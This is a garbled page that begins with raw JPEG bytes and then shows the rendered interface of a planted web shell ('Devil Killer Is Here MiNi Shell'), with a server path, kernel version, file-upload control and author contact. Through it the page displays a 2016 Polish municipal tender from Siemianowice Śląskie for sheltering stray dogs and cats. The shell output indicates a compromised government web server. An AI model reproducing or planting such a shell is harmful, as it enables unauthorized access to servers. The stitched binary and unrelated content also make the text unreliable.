JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160229/43966-N-2016.html

<p class="kh_header"><b>Siemianowice Śląskie: Przyjmowanie bezdomnych zwierząt (psów i kotów) z terenu Miasta Siemianowice Śląskie i przechowywanie ich w schronisku dla bezdomnych zwierząt</b><br>
<b>Numer ogłoszenia: 43966 - 2016; data zamieszczenia: 29.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Siemianowice  Śląskie , ul. Jana Pawła II 10, 41-100 Siemianowice Śląskie, woj. śląskie, tel. 32 7605200, faks 32 7605280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.siemianowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przyjmowanie bezdomnych zwierząt (psów i kotów) z terenu Miasta Siemianowice Śląskie i przechowywanie ich w schronisku dla bezdomnych zwierząt.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie przyjmowania bezdomnych zwierząt (psów i kotów) z terenu Miasta Siemianowice Śląskie i przechowywania ich w schronisku dla bezdomnych zwierząt.

W ramach niniejszego przedmiotu zamówienia Zamawiający zleca do wykonania:
1. Całodobowe przyjmowanie i przechowywanie w schronisku dla bezdomnych zwierząt psów i kotów dostarczonych z terenu miasta Siemianowice Śląskie przez wskazanego przez Zamawiającego Wykonawcę odpowiedzialnego za wyłapywanie i przewożenie zwierząt, Straż Miejską oraz inną osobę wskazana przez Zamawiającego:
a) ilość przyjętych zwierząt ustala się w wysokości 11 sztuk miesięcznie w ramach miesięcznego wynagrodzenia ryczałtowego,
b) w przypadku, gdy w danym miesiącu nie zostanie wykorzystany w pełni limit 11 sztuk zwierząt przyjętych do schroniska, niewykorzystana pula zwierząt przechodzi na następny miesiąc (maksymalnie dwa miesiące). W takim przypadku w kolejnym miesiącu, w pierwszej kolejności, będą wykorzystane miejsca w ramach puli na dany miesiąc, a  następnie miejsca z niewykorzystanej puli z miesiąca poprzedniego. Miejsca dla zwierząt z niewykorzystanej puli danego miesiąca mogą zostać wykorzystane wyłącznie w kolejnych dwóch następujących po sobie miesiącach. Miejsca dla zwierząt doliczone z niewykorzystanej puli z poprzedniego okresu rozliczone będą po tym okresie, w ramach ustalonego miesięcznego wynagrodzenia ryczałtowego.
Ponadto Wykonawca, w ramach ustalonego wynagrodzenia, nie może odmówić Zamawiającemu przyjęcia dodatkowego zwierzęcia, które: 
- pogryzło człowieka i wymagane jest zapewnienie miejsca oraz odpowiednich warunków w  schronisku do przeprowadzenia obserwacji weterynaryjnej w kierunku wykluczenia  wścieklizny, 
- jest ranne w wypadku drogowym lub w innych okolicznościach,
- stwarza bezpośrednie zagrożenie dla życia lub zdrowia człowieka, oraz
- zostało odebrane właścicielowi na podstawie art. 7 ust. 1 i 3  ustawy z dnia 21 sierpnia 1997 roku o ochronie zwierząt (j.t. Dz. U. z 2013 roku, poz. 856 ze zm.).
2. Objęcie przyjętych zwierząt opieką polegająca na zapewnieniu właściwych warunków bytowych i sanitarnych, w szczególności zapewnianie im pomieszczeń lub boksów chroniących je przed zimnem, upałami i opadami atmosferycznymi, z dostępem do światła dziennego oraz umożliwiających swobodne poruszanie się, a także zapewnianie odpowiedniej karmy i stałego dostępu do wody  zdatnej do picia.
3. Zapewnienie kompleksowej opieki weterynaryjnej nad zwierzętami w ścisłej współpracy z lekarzem weterynarii, w szczególności w zakresie kontroli stanu zdrowia, profilaktyki i leczenia oraz zwalczania pasożytów wewnętrznych i zewnętrznych.
4. Szczepienie przeciwko wściekliźnie i innym chorobom zakaźnym wszystkich psów i kotów przyjętych do schroniska.
5. Wykonywanie przez lekarza weterynarii zabiegów kastracji i sterylizacji bezdomnych zwierząt.
6. Udzielanie pomocy dostarczonym do schroniska psom i kotom, które zostały ranne w wypadkach drogowych lub w innych okolicznościach.
7. Prowadzenie obserwacji weterynaryjnej bezdomnych zwierząt w przypadkach pogryzienia człowieka pod kątem objawów wścieklizny, w uzgodnieniu z Powiatowym Lekarzem Weterynarii.
8. Leczenie przyjętych chorych zwierząt rokujących nadzieję na wyzdrowienie.
9. Przeprowadzenie eutanazji zwierząt w uzasadnionych przypadkach, w uzgodnieniu  z lekarzem weterynarii, zgodnie z ustawą z dnia 21 sierpnia 1997 roku o ochronie zwierząt (j.t. Dz. U. z 2013 r., poz. 856 ze zm.).
10. Zapewnienie oznakowania (czipowania) bezdomnych zwierząt przyjętych do schroniska w sposób umożliwiający ich identyfikację.
11. Przekazywanie zwierząt do adopcji osobom zainteresowanym i zdolnym zapewnić im opiekę i należyte warunki bytowania.
12. Zapewnienie dożywotniego pobytu w schronisku dostarczonym psom i kotom w przypadku braku osoby chętnej do adopcji zwierzęcia.
13. Wykonawca zobowiązany jest do prowadzenia miesięcznego wykazu przyjętych do schroniska zwierząt i przekazania go Zamawiającemu do 10-go dnia każdego miesiąca za poprzedni miesiąc, według wzoru stanowiącego załącznik nr 1 do umowy.
14. Wykonawca zobowiązany jest do prowadzenia miesięcznego wykazu wykonanych zabiegów kastracji i sterylizacji bezdomnych zwierząt i przekazania go Zamawiającemu do 10-go dnia każdego miesiąca za miesiąc poprzedni, według wzoru stanowiącego załącznik nr 2 do umowy.
15.  Wykonawca zobowiązany jest do prowadzenia miesięcznego wykazu wykonanych zabiegów eutanazji zwierząt i  przekazania go Zamawiającemu do 10-go dnia każdego miesiąca za miesiąc poprzedni, według wzoru stanowiącego załącznik nr 3 do umowy.
16. Wykonawca zobowiązany jest do prowadzenia miesięcznego wykazu oznakowanych (zaczipowanych) bezdomnych zwierząt i  przekazania go Zamawiającemu do 10-godnia każdego miesiąca za miesiąc poprzedni, według wzoru stanowiącego załącznik nr 4 do umowy.
17. Wykonawca zobowiązany jest do prowadzenia miesięcznego wykazu oddanych do adopcji zwierząt i  przekazania go Zamawiającemu do 10-go dnia każdego miesiąca za miesiąc poprzedni, według wzoru stanowiącego załącznik nr 5 do umowy.

18. Ilość przyjętych z terenu miasta Siemianowice Śląskie do schroniska bezdomnych zwierząt w latach 2013 - 2015 przedstawia się następująco:

Rok: 2015,   Psy:66,   Koty:33,  Razem:99;
Rok: 2014, Psy:103, Koty:17, Razem:120;
Rok: 2013, Psy:86, Koty:21, Razem:107.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających do zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień- zgodnie z art 67 ust 1 pkt 6 ustawy Prawo zamówień publicznych. Przedmiotem zamówień uzupełniających mogą być usługi w zakresie przyjmowania bezdomnych zwierząt (psów i kotów) z terenu Miasta Siemianowice Śląskie i przechowywania ich w schronisku dla bezdomnych zwierząt.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.38.00.00-0, 85.20.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia przez Wykonawcę wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada aktualne zezwolenie wydane przez wójta, burmistrza lub prezydenta miasta w zakresie prowadzenia schronisk dla bezdomnych zwierząt na podstawie art. 7 ust. 1 pkt 4 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (j.t. Dz. U. z 2013 r., poz. 1399 ze zm.). 
2.  Ocena spełniania warunków udziału w postępowaniu nastąpi na podstawie  dokumentów i oświadczeń złożonych przez Wykonawcę wraz z ofertą.

3. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, pod kątem potwierdzania przez informacje w nich zawarte spełniania przez Wykonawcę warunków udziału w postępowaniu.

4. Sposób oceny spełniania warunków wymaganych od wykonawców będzie zgodny z formułą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Odległość schroniska od siedziby Zamawiającego - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość następujących zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1.1.  zmiany wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
a) stawki podatku od towarów i usług,
b) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,
c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne
- jeżeli zmiany te będą miały wpływ na koszt wykonania zamówienia przez Wykonawcę.
1.1.1. W przypadku zmian, o których mowa w pkt 1.1. b) i c) Wykonawca może wystąpić do
Zamawiającego z wnioskiem o zmianę wynagrodzenia, przedkładając odpowiednie dokumenty potwierdzające zasadność złożenia takiego wniosku. Wykonawca winien wykazać ponad wszelką wątpliwość, że zaistniała zmiana ma bezpośredni wpływ na koszty wykonania zamówienia oraz określić stopień, w jakim wpłynie ona na wysokość wynagrodzenia.
1.1.2. W przypadku zmiany, o której mowa w pkt 1.1. b) wynagrodzenia Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzenia osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego wynagrodzenia minimalnego, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
1.1.3. W przypadku zmiany, o której mowa w pkt 1.1. c) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.
1.1.4. W przypadku zmian, o których mowa w pkt 1.1. b) i c) - jeżeli Wykonawca w terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian złoży pisemny wniosek, wówczas zmiana wynagrodzenia nastąpi z dniem wejścia w życie tych zmian, a jeżeli Wykonawca złoży pisemny wniosek po 30 dniach od dnia wejścia w życie przepisów dokonujących tych zmian - od chwili złożenia wniosku.
1.1.5. Zmiana wynagrodzenia w okolicznościach, o których mowa w pkt 1.1. b) i c) powyżej zostanie dokonana po zaakceptowaniu przez Zamawiającego wniosku Wykonawcy, o którym mowa w pkt 1.1.1.,
1.1.6. Zmiana wysokości wynagrodzenia należnego Wykonawcy,  w przypadku o którym mowa w pkt 1.1. a) zostanie dokonana zgodnie z zapisem § 3 pkt 2 i 3 wzoru umowy (Dodatek nr 5 do SIWZ).
2. Wszystkie zmiany treści umowy wymagają zachowania formy pisemnej pod rygorem nieważności - z zastrzeżeniem  § 4 pkt 1.7 wzoru umowy (Dodatek nr 5 do SIWZ).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.msiemianowicesl.finn.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydz.Gospodarki Komunalnej Urząd Miasta Siemianowice Śl.ul.Michałkowicka105 pok.20, 41-103 Siemianowice Śl. lub za zaliczeniem pocztowym,po wcześniejszym złożeniu wniosku.Cena SIWZ 11,10zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.03.2016 godzina 09:15, miejsce: Ofertę należy złożyć w Kancelarii Podawczej Urzędu Miasta Siemianowice Śląskie przy ul. Michałkowickiej 105, 41-103 Siemianowice Śląskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com